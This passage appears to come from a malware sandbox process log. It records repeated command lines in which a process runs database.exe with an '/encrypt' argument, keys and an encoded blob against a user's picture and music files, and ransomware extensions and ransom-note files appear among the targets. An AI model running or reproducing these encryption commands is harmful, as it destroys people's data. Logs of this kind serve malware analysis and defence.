C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\xY3tbcbQ-SrCNfD0Q.[[email protected]].gif"5⤵PID:2408
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\!HELP_SOS.hta.gif"5⤵PID:4600
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ApproveCheckpoint.emf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3084
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\CheckpointRegister.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5696
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ClearEdit.tiff.sage.gif"5⤵PID:1896
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\CompressAssert.pcx.sage.gif"5⤵PID:796
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\DenyBlock.tif.sage.gif"5⤵PID:4932
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4304
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\EnableWait.dxf.sage.gif"5⤵PID:5940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\GroupRedo.raw.sage.gif"5⤵PID:2104
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\LimitExport.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\LockPublish.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1716
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\MergeReset.emf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5060
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\My Wallpaper.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2408
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\NewResolve.gif.sage.gif"5⤵PID:4044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\OutRestore.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2456
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushOut.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:580
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushRepair.tif.sage.gif"5⤵PID:6544
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushSearch.svg.sage.gif"5⤵PID:5316
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\README_sTlLoTpq.hta.gif"5⤵PID:6668
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ReadRegister.gif.sage.gif"5⤵PID:1844
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ReceiveConvertFrom.emz.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5656
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RegisterBlock.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3060
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" 